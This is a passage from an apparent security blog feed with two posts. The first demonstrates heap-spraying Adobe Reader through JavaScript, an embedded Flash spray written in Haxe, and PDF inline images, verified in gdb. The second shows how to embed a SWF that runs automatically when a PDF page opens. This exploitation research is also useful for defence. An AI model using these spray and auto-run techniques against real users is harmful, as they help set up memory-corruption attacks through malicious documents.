<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread JSSpray.pdf</div>
<p>Its running! Now get its PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8197 426104K /opt/Adobe/.../bin/acroread JSSpray.pdf
</pre>
</div>
<p>OK 400Megabytes! It seems to be working!<br />
Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<p>cat /proc/8197/maps |head -n16</p>
<pre>08048000-0970b000 r-xp 00000000 08:01 1754759 ..bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ..bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
098f9000-0b0bc000 rwxp 00000000 00:00 0       [heap]
a0200000-a0221000 rwxp 00000000 00:00 0
a0221000-a0300000 ---p 00000000 00:00 0
a0389000-a038a000 ---p 00000000 00:00 0
a038a000-a0c8a000 rwxp 00000000 00:00 0
a0d8a000-a0e8a000 rwxp 00000000 00:00 0
a0f89000-a0f8a000 ---p 00000000 00:00 0
a0f8a000-a138a000 rwxp 00000000 00:00 0
a13e2000-a188a000 rwxp 00000000 00:00 0
a192a000-a198a000 rwxs 00000000 00:08 2654222 /SYSV0.. (del)
a198a000-b3b8a000 rwxp 00000000 00:00 0
b3b8a000-b3d8b000 rwxp 00000000 00:00 0
b3e4e000-b3f4e000 rwxp 00000000 00:00 0
</pre>
<p>&#8230;</p>
</div>
<p>a198a000-b3b8a000 is probably the key. Let&#8217;s take a look with the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8197
(gdb) x/8x 0xb0000000+0x1000*0
0xb0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xb0000000+0x1000*1
0xb0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xb0000000+0x1000*2
0xb0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xb0002010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>It worked! We got the same values from memory 0&#215;1000 aligned. We just need to hope some of our 300Megabytes were put in the 0xb0000000 address. The JS spraying PDF version is <a href="http://feliam.files.wordpress.com/2010/02/jsspray.pdf">here</a>.</p>
<h2>The ActionScript way</h2>
<p>For the actual Actionscript part of this we&#8217;ll pick up from <a href="http://www.pornosecurity.org/blog/all-you-can-spray">here</a>. And for the PDF part we&#8217;ll take the SWF into PDF tool from this <a href="http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/">post</a>.</p>
<p>OK, the the following <a href="http://haxe.org/">Haxe</a> code will allocate a configurable number of times some 0&#215;100000 bytes long memory chunks composed from the concatenation of the passed minichunks.<br />
It expects as a parameter the content of the minichunk and the number of times it should replicate the &#8216;big&#8217; 0&#215;100000 bytes long chunk. For more info about AS sprays check <a href="http://roeehay.blogspot.com/2009/08/exploitation-of-cve-2009-1869.html">this</a> and <a href="http://blog.fireeye.com/research/2009/07/actionscript_heap_spray.html">that</a>.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 rgb(255,255,179);color:rgb(0,128,153);margin:10px;padding:10px;">
<pre>class MySpray
{
 static var Memory = new Array();
 static var chunk_size = 0x100000;
 static var chunk_num;
 static var minichunk;
 static var t;

 static function main()
 {
  minichunk = flash.Lib.current.loaderInfo.parameters.minichunk;
  chunk_num = Std.parseInt(flash.Lib.current.loaderInfo.parameters.N);
  t = new haxe.Timer(7);
  t.run = doSpray;
 }

 static function doSpray()
 {
  var chunk = new flash.utils.ByteArray();

  while(chunk.length &lt; chunk_size)
   {
      chunk.writeMultiByte(minichunk, &#039;us-ascii&#039;);
   }

   for(i in 0...chunk_num)
   {
     Memory.push(chunk);
   }

   chunk_num--;
   if(chunk_num == 0)
   {
     t.stop();
   }
 }
}
</pre>
</div>
<p>Of course, it needs haxe to compile. And it compiles to Flash 9 issuing this command:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">haxe -main MySpray -swf9 MySpray.swf</div>
<p>Once you have the swf file you may insert it into a pdf file using this <a href="http://pastebin.com/f458bd175">py</a> from this <a href="http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/">post</a>.</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>python SWFSpray.py MySpray.swf "N=300&amp;minichunk=&lt;&lt;&lt;&gt;&gt;&gt;" &gt; SWFSpray.pdf
</pre>
</div>
<p>OK, Let&#8217;s run Adobe Reader:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread JSSpray.pdf</div>
<p>&#8230; get its PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8234 568144K /opt/Adobe/.../bin/acroread SWFSpray.pdf
</pre>
</div>
<p>OK 500Megabytes! It seems to be working!</p>
<p>Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:10px;">
<pre>cat /proc/8234/maps |head -n16
08048000-0970b000 r-xp 00000000 08:01 1754759 ../bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ../bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
0a712000-0ccda000 rwxp 00000000 00:00 0       [heap]
980f6000-983f6000 rwxp 00000000 00:00 0
983f6000-990f6000 ---p 00000000 00:00 0
990f6000-9a1f6000 rwxp 00000000 00:00 0
9a261000-9a429000 rwxp 00000000 00:00 0
9a5f0000-9b8f0000 rwxp 00000000 00:00 0
9b90a000-9cb0a000 rwxp 00000000 00:00 0
9cbee000-9ddee000 rwxp 00000000 00:00 0
9de9c000-9f09c000 rwxp 00000000 00:00 0
9f114000-a0314000 rwxp 00000000 00:00 0
a0356000-a1456000 rwxp 00000000 00:00 0
a145e000-a245e000 rwxp 00000000 00:00 0
a254e000-a354e000 rwxp 00000000 00:00 0
...
</pre>
</div>
<p>Let&#8217;s see what&#8217;s inside 9f114000-a0314000 with the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8234
(gdb) x/8x 0xa0000000+0x1000*0
0xa0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*1
0xa0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*2
0xa0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0002010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>It also worked! It feels a little slow though.</p>
<h2>The Image way</h2>
<p>As both the PDF specification and the Adobe implementation have been so bloated there are probably a lot of different ways to acomplish this. Our approach is to use as less PDF objects as posible. For this we&#8217;ll fill the memory using embeded images. There is a way explained in <a href="http://www.adobe.com/devnet/acrobat/pdfs/PDF32000_2008.pdf">PDF32000 8.9.7 Inline Images</a> for inlining image data into the page contents.</p>
<div>As an alternative to the image XObjects described in 8.9.5, &#8220;Image Dictionaries&#8221;, a sampled image may be specified in the form of an inline image. This type of image shall be defined directly within the content stream in which it will be painted instead of being defined as a separate object. Because the inline format gives the reader less flexibility in managing the image data, it shall only be used for small images (4 KB or less).</div>
<p>Basically a PDF inline image goes inside the content stream of a page and has this look:</p>
<div style="font-family:monospace;margin:10px;padding:10px;">BI<br />
&#8230; Key-value pairs &#8230;<br />
ID<br />
&#8230; Image data &#8230;<br />
EI</div>
<p>where &#8230;</p>
<div style="font-family:monospace;margin:10px;padding:10px;">
<pre> BI       Begins an inline image object.
 ID       Begins the image data for an inline image object.
 EI       Ends an inline image object.
</pre>
</div>
<p>And here it is an example in the form of a python string&#8230;</p>
<div style="font-family:monospace;margin:10px;padding:10px;">&#8220;BI /W 10 /H 1 /CS /G /BPC 8 ID AAAAAAAAEI&#8221;</div>
<p>&#8230; which represents a grayscale 10 pixels image of the color represented by &#8220;A&#8221;. No so big for our purpose but you got the idea. Also the 4k restriction/recomendation pointed out in the documentation is not enforced by Adobe&#8217;s implementation, so we can go really big. Also the page contents are PDF streams and could be compacted and filtered with any number of pdf filters, meaning&#8230; small PDF file size.</p>
<p>So <a href="http://pastebin.com/f1749356">here</a> you have the py for generating a memory filling PDF using nothing but inline images.</p>
<p>Create the pdf:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">python PDFSpray.py &gt;PDFSpray.pdf</div>
<p>Run Adobe Reader:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">acroread PDFSpray.pdf</div>
<p>&#8230; get it&#8217;s PID and check its memory footprint:</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>ps -eo pid,vsz,cmd -ww --sort=pid |grep acroread
8805 532984K /opt/Adobe/.../bin/acroread PDFSpray.pdf
</pre>
</div>
<p>OK 500Megabytes! It seems to be working!</p>
<p>Let&#8217;s check out its memory mappings&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:10px;">
<pre>cat /proc/8805/maps |head -n16
08048000-0970b000 r-xp 00000000 08:01 1754759 ../bin/acroread
0970b000-09792000 rwxp 016c2000 08:01 1754759 ../bin/acroread
09792000-097a0000 rwxp 00000000 00:00 0
0985f000-0ba2f000 rwxp 00000000 00:00 0       [heap]
9a35c000-9a35d000 ---p 00000000 00:00 0
9a35d000-9a45d000 rwxp 00000000 00:00 0
9a45d000-9a45e000 ---p 00000000 00:00 0
9a45e000-a745e000 rwxp 00000000 00:00 0
a748c000-ad88c000 rwxp 00000000 00:00 0
adce0000-b40e0000 rwxp 00000000 00:00 0
</pre>
</div>
<p>And in the debugger&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 rgb(0,0,0);color:rgb(86,255,11);margin:1px;padding:20px;">
<pre>gdb
GNU gdb (Gentoo 7.0 p1) 7.0
Copyright (C) 2009 Free Software Foundation, Inc.
(gdb) attach 8805
(gdb) x/8x 0xa0000000
0xa0000000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0000010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*1
0xa0001000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0001010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*2
0xa0002000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0002010: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/8x 0xa0000000+0x1000*3
0xa0003000: 0x3c3c3c3c 0x41414141 0x41414141 0x41414141
0xa0003010: 0x41414141 0x41414141 0x41414141 0x41414141
</pre>
</div>
<p>Again we have achieved our goal! </p>
<h2> The sizes: </h2>
<p>Here you may compare the sizes of the resulting PDF files&#8230;</p>
<table>
<tbody>
<tr>
<td>File</td>
<td>size</td>
</tr>
<tr>
<td>JSSpray.pdf</td>
<td>800</td>
</tr>
<tr>
<td>PDFSpray.pdf</td>
<td>645050</td>
</tr>
<tr>
<td>SWFSpray.pdf</td>
<td>9477</td>
</tr>
</tbody>
</table>
<h2>The baseline</h2>
<p>To gain perspective here you have the spec of the system where we tried all this&#8230;</p>
<pre>Base memory consumption of an idle acroread::
117056k /opt/Adobe/Reader9/Reader/intellinux/bin/acroread

PaXtest::
Mode: kiddie
Linux localhost 2.6.31-gentoo-r6 #3 SMP Mon Dec 21 08:31:19 ART 2009
i686 Intel(R) Core(TM)2 CPU T5500 @ 1.66GHz GenuineIntel GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable anonymous mapping (mprotect)  : Vulnerable
Executable bss (mprotect)                : Vulnerable
Executable data (mprotect)               : Vulnerable
Executable heap (mprotect)               : Vulnerable
Executable stack (mprotect)              : Vulnerable
Executable shared library bss (mprotect) : Vulnerable
Executable shared library data (mprotect): Vulnerable
Writable text segments                   : Vulnerable
Anonymous mapping randomisation test     : 9 bits (guessed)
Heap randomisation test (ET_EXEC)        : 14 bits (guessed)
Heap randomisation test (ET_DYN)         : 16 bits (guessed)
Main executable randomisation (ET_EXEC)  : No randomisation
Main executable randomisation (ET_DYN)   : 8 bits (guessed)
Shared library randomisation test        : 10 bits (guessed)
Stack randomisation test (SEGMEXEC)      : 19 bits (guessed)
Stack randomisation test (PAGEEXEC)      : 19 bits (guessed)
Return to function (strcpy)              : Vulnerable
Return to function (memcpy)              : Vulnerable
Return to function (strcpy, RANDEXEC)    : Vulnerable
Return to function (memcpy, RANDEXEC)    : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

</pre>
<h2>Conclusion:</h2>
<p>Yes we can fill it!<br />
There probably are and will be 1000000 ways to fill a browser memory, so it may be a good idea to stop trying to detect the source of the spray and instead, try detecting the spray itself. Also bear in mind that the actual spray may not contain code all the time, it may contain just pointers to do some ret2libc oriented programming.</p>
<p>You may grab a test bundle with all the code from <a href="http://sites.google.com/site/felipeandresmanzano/fillHeap.tar.gz?attredirects=0&amp;d=1">here</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/162/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/162/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=162&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/02/15/filling-adobes-heap/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/02/heapdraw1.png?w=300" medium="image">
			<media:title type="html">heapdraw</media:title>
		</media:content>
	</item>
		<item>
		<title>Flash on a PDF with miniPDF.py…</title>
		<link>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/</link>
		<comments>http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 21:45:35 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[swf]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=165</guid>
		<description><![CDATA[Due to the recent advances in exploitation techniques it became really important to put flash every were we can. Flash AHAHHHHHHHHHHHHHHH!!!! In this post we are going to show how to add a swf(Flash) file to a PDF file using our miniPDF.py lib. Flash support is relatively new in PDF and come into the scene [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=165&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<p>Due to the recent advances in exploitation techniques it became really important to put flash every were we can.</p>
<table>
<tbody>
<tr>
<td>
<p style="text-align:center;">Flash AHAHHHHHHHHHHHHHHH!!!!</p>
<p>In this post we are going to show how to add a swf(Flash) file to a PDF file  using our miniPDF.py lib.</td>
<td><img src="http://feliam.files.wordpress.com/2010/02/flashlogo1.jpg?w=60&#038;h=60" alt="" width="60" height="60" /></td>
</tr>
</tbody>
</table>
<p>Flash support is relatively new in PDF and come into the scene  primary for doing the PDF portable collection thing and such. We&#8217;ll  follow the steps described in <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a>, so you probably need to grab it  and keep it close to you.  In the case you&#8217;ve missed the previous posts  here you have a copy of the <a href="http://pastebin.com/f5f8ee3cd">miniPDF.py</a> so you can take a quick look. We are going to  use that lib mainly as we did in earlier posts and start adding PDF objects  until&#8230;  &#8211;FLASH!&#8211; we end up with a one paged PDF with a running embedded SWF. OK, so lets start&#8230;<br />
<span id="more-165"></span><br />
First we import the lib and create a PDFDoc object representing a  document in memory &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>doc = PDFDoc()
</pre>
</div>
<p>&#8230; prepare an empty content stream for the page and add it to the  document.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>contents = PDFStream('')
doc.add(contents)
</pre>
</div>
<p>The minimal page object. We construct it and add it to the document like this&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page = PDFDict()
page.add("Type", PDFName("Page"))
page.add("Contents", PDFRef(contents))
doc.add(page)
</pre>
</div>
<p>&#8230; then we need the list of pages. In this case containing just or  blank page.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>pages = PDFDict()
pages.add("Type", PDFName("Pages"))
pages.add("Kids", PDFArray(PDFRef(page)))
pages.add("Count", PDFNum(1))
doc.add(pages)
</pre>
</div>
<p>Let&#8217;s be nice and honor the PDF structure as stated in .We link the  page to its parent.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page.add("Parent", PDFRef(pages))
</pre>
</div>
<p>And finally we add the catalog wich is the root object of this PDF.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>catalog = PDFDict()
catalog.add("Type", PDFName("Catalog"))
catalog.add("Pages", PDFRef(pages))
doc.add(catalog)
doc.setRoot(catalog)
</pre>
</div>
<p>If we render that like this&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print doc
</pre>
</div>
<p>we&#8217;ll get a clean minimalistic PDF file with just one blank page.</p>
<table>
<tbody>
<tr>
<td><img src="http://feliam.files.wordpress.com/2010/01/basepdfpdf.png?w=190" alt="" /></td>
<td>Here you have the <a href="http://pastebin.com/f61812150">mkMINIPDF.py</a> python file and the generated <a href="http://feliam.files.wordpress.com/2010/02/mini.pdf">example</a>.</p>
<p style="text-align:center;">-Hey Mom look what I did!! A mini blank PDf file!!! look! look!</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:right;">Not so exiting though.</p>
</td>
</tr>
</tbody>
</table>
<h2>The annotation</h2>
<p>As stated in the <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a> flash support in PDF is implemented as a type of annotation. More precisely, annotation type  &#8220;RichMedia&#8221;. So we go back to the PDF32000 specification section 12.5  and take a look what a annotation is.</p>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;An annotation associates an object such as a note, sound, or  movie with a location on a page of a PDF document, or provides a way to interact with the user by means of the  mouse and keyboard. PDF includes a wide variety of standard annotation types.&#8221;&#8217;</div>
<p>So we construct the RichMedia annotation object with all the required  fields &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>annot = PDFDict()
annot.add('Type',PDFName('Annot'))
annot.add('Subtype',PDFName('RichMedia'))
annot.add('Rect','[ 266 116 430 204 ]')
doc.add(annot)
</pre>
</div>
<p>&#8230; and we add it to our page.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>page.add("Annots", PDFArray([PDFRef(annot)]))
</pre>
</div>
<p>This has nothing to do with flash yet. If we keep going trough the  <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000 </a> in TABLE 9.49 there is a list of the  extra annotation entries specific to a RichMedia annotation.  Wich are  RichMediaSettings and RichMediaContents. So let&#8217;s add those two to the  annotation dictionary.</p>
<p>Add a RichMediaSetting empty container to the document..</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMS = PDFDict()
doc.add(RMS)
</pre>
</div>
<p>&#8230; then the same with the a RichMediaContent dictionary.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMC = PDFDict()
doc.add(RMC)
</pre>
</div>
<p>Both empty for now, we add it to the annotation..</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>annot.add('RichMediaSettings', PDFRef(RMS))
annot.add('RichMediaContent', PDFRef(RMC))
</pre>
</div>
<h2>The RichMediaSettings</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;Annotation described in Section 9.5.1 of the PDF Reference. The  RichMediaSettings dictionary stores the conditions and responses that occur in response to certain events, such  as activation and deactivation of the annotation, and contains two dictionaries.&#8221;&#8217;</div>
<p>For the RichMediaSettings dictionary we need an activation and a  deactivation dictionaries basically telling when the annotation should  activate and deactivate&#8230;</p>
<p>First we add the activation dictionary. The &#8216;PO&#8217; condition means  &#8216;when the page containing the annotation is opened&#8217;. There are other  options in the doc.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>activation = PDFDict()
activation.add('Type', PDFName('RichMediaActivation'))
activation.add('Condition', PDFName('PO'))
doc.add(activation)
</pre>
</div>
<p>And the deactivation dictionary. The &#8216;XD&#8217; means &#8216;run until  deactivated by the user&#8217;.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>deactivation = PDFDict()
deactivation.add('Type', PDFName('RichMediaDeactivation'))
deactivation.add('Condition', PDFName('XD'))
doc.add(deactivation)
</pre>
</div>
<p>And then the RichMediaSettings, flagging the annotations as being of  type &#8216;Flash&#8217;. Note that we&#8217;ve already constructed and added an empty  object representing this a couple of line before. We just populate it.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMS.add('Type',PDFName('RichMediaSettings'))
RMS.add('Subtype',PDFName('Flash'))
RMS.add('Activation', PDFRef(activation))
RMS.add('Deactivation', PDFRef(deactivation))
</pre>
</div>
<h2>The RichMediaContents</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;The RichMediaContent dictionary contains content that is present  within the annotation as referenced by the RichMediaSettings dictionary. &#8221;&#8217;</div>
<p>For the RichMediaContent dictionary we first need at least two  things. The assets, a name tree of embedded file specification  dictionaries. And a bunch of RichMediaConfiguration dictionaries.</p>
<p>The assets is the one pointing to the files involved as, for example,  our .swf file. An asset name tree has this look:</p>
<pre>29 0 obj
&lt;&lt; /Names    [      (Flash.swf) 31 0 R    ] &gt;&gt;
endobj
</pre>
<p>We take the file embedding functionality from this post. And will not  trait it here, there is enough PDF madness with the Flash part. The  <a href="http://pastebin.com/f40d0434e">_zipEmbeddeFile</a> function take a filename return a filespec object after  embedding the file into the PDF doc. We take the Flash filename from the  first argument to the python.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>assets = PDFDict()
swfname = PDFString(sys.argv[1])
efref = PDFRef(_zipEmbeddeFile(doc, sys.argv[1]))
assets.add('Names',PDFArray([swfname, efref]))
doc.add(assets)
</pre>
</div>
<p>Now we need the RichMediaConfiguration dictionaries that wich in our  case will be just one (see <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>#TABLE 9.51).</p>
<h2>RichMediaConfiguration Dictionary</h2>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;The RichMediaConfiguration dictionary describes a set of  instances that are loaded for a given scene configuration. The configuration to be loaded when an annotation is  activated is referenced by the Configuration key in the RichMediaActivation dictionary specified in the  RichMediaSettings dictionary.&#8221;&#8217;</div>
<p>But first lets declare the instances array we need for the  RichMediaConfiruration. We&#8217;ll populate it in a while.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>instances = []
</pre>
</div>
<p>And the actual RichMediaConfiguration.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMCfg = PDFDict()
RMCfg.add('Type',PDFName('RichMediaConfiguration'))
RMCfg.add('Subtype',PDFName('Flash'))
RMCfg.add('Name',PDFString('ElFlash'))
RMCfg.add('Instances', PDFArray(instances))
doc.add(RMCfg)
</pre>
</div>
<p>And now we have most of the necessary for the RichMediaContent, lets  add it&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMC = PDFDict()
RMC.add('Type', PDFName('RichMediaContent'))
RMC.add('Assets', PDFRef(assets))
RMC.add('Configurations',PDFArray([PDFRef(RMCfg)]))
doc.add(RMC)
</pre>
</div>
<p>But we have leaved the instances array empty, and erg.. we need it  so..</p>
<h3>RichMediaInstance Dictionary</h3>
<div style="font-style:italic;font-size:big;background:none repeat scroll 0 0 #fbdfdf;margin:20px;padding:20px;">&#8221;&#8217;The RichMediaInstance dictionary, referenced by the Instances  entry of the RichMediaConfiguration dictionary (“RichMediaConfiguration Dictionary” on page 88), describes a  single instance of an asset with settings to populate the artwork of an annotation, as described in Table  9.51b.&#8221;&#8217;</div>
<p>We are basically going to use this for designating wich embedded file  is the flash and for passing arguments to it. Yes we can pass arguments  to it!!!</p>
<p>The RichMediaInstances array has this look:</p>
<pre>15 0 obj                    % RichMediaInstances array
[  17 0 obj ]
endobj
17 0 obj
&lt;&lt; /Type /RichMediaInstance
   /Subtype /Flash
   /Asset 31 0 R
   /Params 18 0 R
&gt;&gt;
endobj
</pre>
<p>And now we put together our only RichMediaInstance dictionary (see  <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>#TABLE 9.51b)&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMI = PDFDict()
RMI.add('Type',PDFName('RichMediaInstance'))
RMI.add('Subype',PDFName('Flash'))
RMI.add('Asset',efref)
doc.add(RMI)
</pre>
</div>
<p>And add it to the list of instances referenced from  RichMediaConfiguration dict.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>instances.append(PDFRef(RMI))
</pre>
</div>
<p>Also for passing parameters we could add a RichMediaParams dictionary  (see <a href="http://www.adobe.com/devnet/acrobat/pdfs/adobe_supplement_iso32000.pdf">Adobe® Supplement to the ISO 32000</a>#TABLE 9.51c). We get the parameters from the content of  the file named in the second argument passed to the python.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMParams = PDFDict()
RMParams.add('Type', PDFName('RichMediaParams'))
RMParams.add('FlashVars', PDFString(file(sys.argv[2]).read()))
RMParams.add('Binding', PDFName('Background'))
doc.add(RMParams)
</pre>
</div>
<p>Also we need to link it from the RichMediaInstance&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>RMI.add('Params',PDFRef(RMParams))
</pre>
</div>
